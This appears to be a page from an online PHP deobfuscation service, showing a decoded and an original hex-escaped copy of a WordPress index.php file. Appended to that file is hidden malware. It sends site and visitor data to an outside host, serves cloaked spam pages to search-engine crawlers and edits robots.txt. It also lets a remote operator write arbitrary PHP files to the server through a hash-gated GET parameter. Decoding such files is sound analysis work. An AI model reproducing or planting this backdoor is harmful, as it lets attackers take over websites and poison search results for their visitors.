Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto LukYg; Nxm4H: $lag = @$_SERVER[ "\110\124\x54\120\x5f\x41\103\x43\x45\1..
Decoded Output download
<?php
goto LukYg;
Nxm4H:
$lag = @$_SERVER[
"HTTP_ACCEPT_LANGUAGE"
];
goto hliAb;
DxMMm:
$host = $_SERVER["HTTP_HOST"];
goto Nxm4H;
Yf7i2:
$htwe = "http";
goto jaq3f;
EGash:
$web =
$htwe .
"://" .
$towe .
"/inde.php?web=" .
$host .
"&zz=" .
sbot() .
"&uri=" .
$ddur .
"&urlshang=" .
$usse .
"&http=" .
$http .
"&lang=" .
$lag;
goto pWFc1;
Fp_2H:
function ishtt()
{
if (
isset($_SERVER["HTTPS"]) &&
strtolower($_SERVER["HTTPS"]) !== "off"
) {
return true;
} elseif (
isset(
$_SERVER[
"HTTP_X_FORWARDED_PROTO"
]
) &&
$_SERVER[
"HTTP_X_FORWARDED_PROTO"
] === "https"
) {
return true;
} elseif (
isset(
$_SERVER[
"HTTP_FRONT_END_HTTPS"
]
) &&
strtolower(
$_SERVER[
"HTTP_FRONT_END_HTTPS"
]
) !== "off"
) {
return true;
}
return false;
}
goto DxMMm;
pWFc1:
$htag = trim(daag($web));
goto RW6NB;
A0u0Z:
if ($ddur_tmp == "") {
$ddur_tmp = "/";
}
goto AqDRw;
An0rr:
function st_uri()
{
if (isset($_SERVER["REQUEST_URI"])) {
$ddur = $_SERVER["REQUEST_URI"];
} else {
if (isset($_SERVER["argv"])) {
$ddur =
$_SERVER["PHP_SELF"] .
"?" .
$_SERVER["argv"][0];
} else {
$ddur =
$_SERVER["PHP_SELF"] .
"?" .
$_SERVER["QUERY_STRING"];
}
}
return $ddur;
}
goto lH_73;
uoI7m:
function pingmap($url)
{
$url_arr = explode("\xd
", trim($url));
$return_str = "";
foreach ($url_arr as $pingUrl) {
$pingRes = daag($pingUrl);
$ok =
strpos(
$pingRes,
"Sitemap Notification Received"
) !== false
? "pingok"
: "error";
$return_str .= $pingUrl . "-- " . $ok . "<br>";
}
return $return_str;
}
goto vcI3i;
HhrzU:
$goto = "qmzt";
goto Yf7i2;
lH_73:
$towe = $goto . ".needtt" . ".xyz";
goto Fp_2H;
qUq2C:
if (@$_GET["pd"] != "") {
$acot = @$_GET["mapname"];
$action = @$_GET["action"];
if (
isset($_SERVER["DOCUMENT_ROOT"])
) {
$path =
$_SERVER["DOCUMENT_ROOT"];
} else {
$path = dirname(__FILE__);
}
if (!$action) {
$action = "put";
}
if ($action == "put") {
if (strstr($acot, ".xml")) {
$map_path =
$path . "/sitemap.xml";
if (is_file($map_path)) {
@unlink($map_path);
}
$file_path = $path . "/robots.txt";
if (file_exists($file_path)) {
$data = daag($file_path);
} else {
$data =
"User-agent: *Allow: /";
}
$sturs = $http . "://" . $host . "/" . $acot;
if (stristr($data, $sturs)) {
echo "<br>sitemap already added!<br>";
} else {
if (
file_put_contents(
$file_path,
trim($data) .
"\xd\xa" .
"Sitemap: " .
$sturs
)
) {
echo "<br>ok<br>";
} else {
echo "<br> false!<br>";
}
}
} else {
echo "<br> false!<br>";
}
if (strstr($acot, ".p" . "hp")) {
if (
sha1(sha1(@$_GET["a"])) ==
daag(
$htwe .
"://" .
$towe .
"/a.p" .
"hp"
)
) {
$dstr = @$_GET["dstr"];
if (file_put_contents($path . "/" . $acot, $dstr)) {
echo "ok";
}
}
}
}
die();
}
goto EGash;
LukYg:
@set_time_limit(3600);
goto YILum;
RW6NB:
if (
!strstr($htag, "nobotuseragent")
) {
if (
strstr(
$htag,
"okhtmlgetcontent"
)
) {
@header(
"Content-type: text/html; charset=utf-8"
);
$htag = str_replace(
"okhtmlgetcontent",
"",
$htag
);
echo $htag;
die();
} else {
if (
strstr(
$htag,
"okxmlgetcontent"
)
) {
$htag = str_replace(
"okxmlgetcontent",
"",
$htag
);
@header(
"Content-type: text/xml"
);
echo $htag;
die();
} else {
if (
strstr(
$htag,
"pingxmlgetcontent"
)
) {
$htag = str_replace(
"pingxmlgetcontent",
"",
$htag
);
@header(
"Content-type: text/html; charset=utf-8"
);
echo pingmap($htag);
die();
}
}
}
}
goto uoI7m;
hliAb:
$lag = urlencode($lag);
goto o5kL2;
o5kL2:
$usse = "";
goto GHMVa;
CTSa8:
function daag($url)
{
$ficonts = "";
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
$ficonts = curl_exec($ch);
curl_close($ch);
}
if (!$ficonts) {
$ficonts = @file_get_contents($url);
}
return $ficonts;
}
goto ylxjN;
AqDRw:
$ddur = urlencode($ddur_tmp);
goto An0rr;
GHMVa:
if (isset($_SERVER["HTTP_REFERER"])) {
$usse = $_SERVER["HTTP_REFERER"];
$usse = urlencode($usse);
}
goto qUq2C;
eBXy4:
$ddur_tmp = st_uri();
goto A0u0Z;
vcI3i:
function sbot()
{
$uaget = strtolower(
$_SERVER["HTTP_USER_AGENT"]
);
if (
stristr($uaget, "googlebot") ||
stristr($uaget, "bing") ||
stristr($uaget, "yahoo") ||
stristr($uaget, "google") ||
stristr($uaget, "Googlebot") ||
stristr($uaget, "googlebot")
) {
return true;
} else {
return false;
}
}
goto CTSa8;
YILum:
@ignore_user_abort(1);
goto HhrzU;
jaq3f:
if (ishtt()) {
$http = "https";
} else {
$http = "http";
}
goto eBXy4;
ylxjN:
//vx122
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define("WP_USE_THEMES", true);
/** Loads the WordPress Environment and Template */
require dirname(__FILE__) . "/wp-blog-header.php"; ?>
Did this file decode correctly?
Original Code
<?php
goto LukYg;
Nxm4H:
$lag = @$_SERVER[
"\110\124\x54\120\x5f\x41\103\x43\x45\120\124\137\x4c\x41\x4e\107\x55\101\107\x45"
];
goto hliAb;
DxMMm:
$host = $_SERVER["\x48\x54\124\x50\x5f\x48\117\123\x54"];
goto Nxm4H;
Yf7i2:
$htwe = "\x68\164\x74\160";
goto jaq3f;
EGash:
$web =
$htwe .
"\x3a\57\57" .
$towe .
"\x2f\x69\x6e\x64\x65\56\x70\x68\x70\x3f\167\x65\142\x3d" .
$host .
"\46\x7a\x7a\x3d" .
sbot() .
"\x26\x75\162\151\x3d" .
$ddur .
"\x26\x75\162\154\163\x68\141\x6e\147\x3d" .
$usse .
"\46\150\x74\164\160\x3d" .
$http .
"\x26\154\x61\156\147\x3d" .
$lag;
goto pWFc1;
Fp_2H:
function ishtt()
{
if (
isset($_SERVER["\110\124\124\x50\123"]) &&
strtolower($_SERVER["\x48\124\x54\120\x53"]) !== "\157\x66\x66"
) {
return true;
} elseif (
isset(
$_SERVER[
"\x48\124\124\x50\x5f\130\137\x46\x4f\122\x57\101\122\104\x45\104\137\120\122\117\124\x4f"
]
) &&
$_SERVER[
"\110\124\124\120\137\130\137\106\117\122\x57\101\x52\104\105\x44\137\120\x52\117\124\117"
] === "\150\x74\164\160\x73"
) {
return true;
} elseif (
isset(
$_SERVER[
"\110\124\124\x50\x5f\106\x52\x4f\x4e\x54\137\105\116\x44\137\110\124\124\120\123"
]
) &&
strtolower(
$_SERVER[
"\x48\124\124\x50\137\106\x52\117\116\x54\x5f\x45\116\104\x5f\x48\x54\124\120\x53"
]
) !== "\x6f\146\x66"
) {
return true;
}
return false;
}
goto DxMMm;
pWFc1:
$htag = trim(daag($web));
goto RW6NB;
A0u0Z:
if ($ddur_tmp == "") {
$ddur_tmp = "\57";
}
goto AqDRw;
An0rr:
function st_uri()
{
if (isset($_SERVER["\122\x45\x51\x55\105\x53\x54\137\x55\122\111"])) {
$ddur = $_SERVER["\122\105\x51\125\105\123\124\137\x55\x52\x49"];
} else {
if (isset($_SERVER["\x61\x72\147\166"])) {
$ddur =
$_SERVER["\x50\110\x50\x5f\123\105\x4c\106"] .
"\77" .
$_SERVER["\141\x72\147\166"][0];
} else {
$ddur =
$_SERVER["\120\x48\x50\x5f\x53\105\x4c\x46"] .
"\x3f" .
$_SERVER["\x51\x55\105\x52\131\x5f\x53\x54\122\111\116\107"];
}
}
return $ddur;
}
goto lH_73;
uoI7m:
function pingmap($url)
{
$url_arr = explode("\xd\12", trim($url));
$return_str = "";
foreach ($url_arr as $pingUrl) {
$pingRes = daag($pingUrl);
$ok =
strpos(
$pingRes,
"\123\151\x74\145\155\141\x70\40\116\x6f\x74\x69\146\x69\143\x61\x74\151\157\x6e\x20\122\145\143\x65\x69\x76\145\144"
) !== false
? "\160\x69\156\x67\x6f\x6b"
: "\x65\162\x72\157\162";
$return_str .= $pingUrl . "\x2d\55\40" . $ok . "\74\142\x72\76";
}
return $return_str;
}
goto vcI3i;
HhrzU:
$goto = "\x71\x6d\172\164";
goto Yf7i2;
lH_73:
$towe = $goto . "\56\156\145\x65\144\x74\x74" . "\56\x78\x79\172";
goto Fp_2H;
qUq2C:
if (@$_GET["\x70\x64"] != "") {
$acot = @$_GET["\x6d\x61\x70\156\x61\155\x65"];
$action = @$_GET["\x61\143\x74\x69\x6f\x6e"];
if (
isset($_SERVER["\x44\117\103\125\115\105\x4e\124\x5f\x52\x4f\x4f\124"])
) {
$path =
$_SERVER["\x44\117\x43\125\115\x45\x4e\x54\137\122\117\117\124"];
} else {
$path = dirname(__FILE__);
}
if (!$action) {
$action = "\x70\165\x74";
}
if ($action == "\160\165\x74") {
if (strstr($acot, "\x2e\170\155\154")) {
$map_path =
$path . "\x2f\x73\x69\x74\145\x6d\x61\160\56\x78\155\x6c";
if (is_file($map_path)) {
@unlink($map_path);
}
$file_path = $path . "\x2f\162\157\x62\x6f\x74\x73\56\x74\170\164";
if (file_exists($file_path)) {
$data = daag($file_path);
} else {
$data =
"\125\163\x65\x72\x2d\x61\147\x65\x6e\164\x3a\40\x2a\101\x6c\154\157\167\x3a\40\x2f";
}
$sturs = $http . "\x3a\57\57" . $host . "\x2f" . $acot;
if (stristr($data, $sturs)) {
echo "\74\142\x72\76\x73\151\164\145\x6d\141\x70\x20\x61\x6c\x72\x65\x61\x64\x79\x20\141\144\144\x65\x64\x21\74\x62\x72\76";
} else {
if (
file_put_contents(
$file_path,
trim($data) .
"\xd\xa" .
"\x53\x69\x74\145\x6d\x61\x70\72\x20" .
$sturs
)
) {
echo "\74\x62\x72\76\157\153\x3c\x62\x72\76";
} else {
echo "\x3c\x62\x72\76\40\x66\141\154\163\x65\x21\x3c\x62\162\x3e";
}
}
} else {
echo "\74\142\x72\76\40\146\141\x6c\163\145\41\74\142\x72\76";
}
if (strstr($acot, "\56\160" . "\x68\x70")) {
if (
sha1(sha1(@$_GET["\x61"])) ==
daag(
$htwe .
"\72\57\x2f" .
$towe .
"\x2f\141\x2e\x70" .
"\x68\160"
)
) {
$dstr = @$_GET["\144\163\x74\162"];
if (file_put_contents($path . "\x2f" . $acot, $dstr)) {
echo "\x6f\153";
}
}
}
}
die();
}
goto EGash;
LukYg:
@set_time_limit(3600);
goto YILum;
RW6NB:
if (
!strstr($htag, "\156\157\142\x6f\164\x75\163\x65\162\x61\x67\145\x6e\x74")
) {
if (
strstr(
$htag,
"\x6f\153\150\164\x6d\x6c\x67\x65\164\143\157\156\x74\x65\156\x74"
)
) {
@header(
"\x43\157\156\x74\145\x6e\x74\x2d\x74\171\160\145\72\x20\164\145\170\x74\57\150\x74\155\154\73\40\143\x68\x61\162\163\x65\x74\75\x75\x74\x66\55\70"
);
$htag = str_replace(
"\x6f\x6b\150\164\x6d\154\147\145\x74\143\157\x6e\164\x65\x6e\164",
"",
$htag
);
echo $htag;
die();
} else {
if (
strstr(
$htag,
"\x6f\x6b\170\155\154\x67\x65\x74\143\157\156\x74\x65\156\x74"
)
) {
$htag = str_replace(
"\x6f\x6b\170\x6d\x6c\x67\145\164\143\x6f\x6e\164\145\x6e\164",
"",
$htag
);
@header(
"\x43\157\156\x74\x65\x6e\164\55\164\x79\x70\145\x3a\40\164\145\x78\x74\x2f\x78\x6d\154"
);
echo $htag;
die();
} else {
if (
strstr(
$htag,
"\160\151\x6e\x67\x78\155\154\147\x65\x74\x63\157\x6e\x74\145\x6e\x74"
)
) {
$htag = str_replace(
"\x70\x69\156\147\170\155\x6c\x67\145\x74\x63\x6f\156\164\x65\156\164",
"",
$htag
);
@header(
"\103\x6f\156\x74\145\156\x74\x2d\x74\x79\160\145\72\x20\164\145\170\x74\x2f\150\x74\155\x6c\x3b\x20\143\x68\x61\162\163\x65\x74\75\x75\x74\x66\x2d\70"
);
echo pingmap($htag);
die();
}
}
}
}
goto uoI7m;
hliAb:
$lag = urlencode($lag);
goto o5kL2;
o5kL2:
$usse = "";
goto GHMVa;
CTSa8:
function daag($url)
{
$ficonts = "";
if (function_exists("\143\x75\x72\154\x5f\151\x6e\151\164")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
$ficonts = curl_exec($ch);
curl_close($ch);
}
if (!$ficonts) {
$ficonts = @file_get_contents($url);
}
return $ficonts;
}
goto ylxjN;
AqDRw:
$ddur = urlencode($ddur_tmp);
goto An0rr;
GHMVa:
if (isset($_SERVER["\x48\x54\x54\x50\137\x52\x45\106\105\122\x45\122"])) {
$usse = $_SERVER["\x48\x54\x54\x50\137\x52\x45\x46\105\122\105\x52"];
$usse = urlencode($usse);
}
goto qUq2C;
eBXy4:
$ddur_tmp = st_uri();
goto A0u0Z;
vcI3i:
function sbot()
{
$uaget = strtolower(
$_SERVER["\x48\124\x54\120\x5f\125\x53\x45\122\x5f\101\x47\x45\x4e\x54"]
);
if (
stristr($uaget, "\147\157\157\x67\x6c\145\x62\x6f\164") ||
stristr($uaget, "\x62\151\156\x67") ||
stristr($uaget, "\171\141\150\157\x6f") ||
stristr($uaget, "\x67\x6f\157\x67\154\145") ||
stristr($uaget, "\x47\x6f\x6f\x67\154\145\x62\x6f\x74") ||
stristr($uaget, "\147\x6f\x6f\147\x6c\145\x62\157\164")
) {
return true;
} else {
return false;
}
}
goto CTSa8;
YILum:
@ignore_user_abort(1);
goto HhrzU;
jaq3f:
if (ishtt()) {
$http = "\x68\164\164\160\x73";
} else {
$http = "\x68\x74\x74\x70";
}
goto eBXy4;
ylxjN:
//vx122
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define("WP_USE_THEMES", true);
/** Loads the WordPress Environment and Template */
require dirname(__FILE__) . "/wp-blog-header.php"; ?>
Function Calls
| None |
Stats
| MD5 | aa5ae26789a2cd590ae396a34a8ddfb0 |
| Eval Count | 0 |
| Decode Time | 44 ms |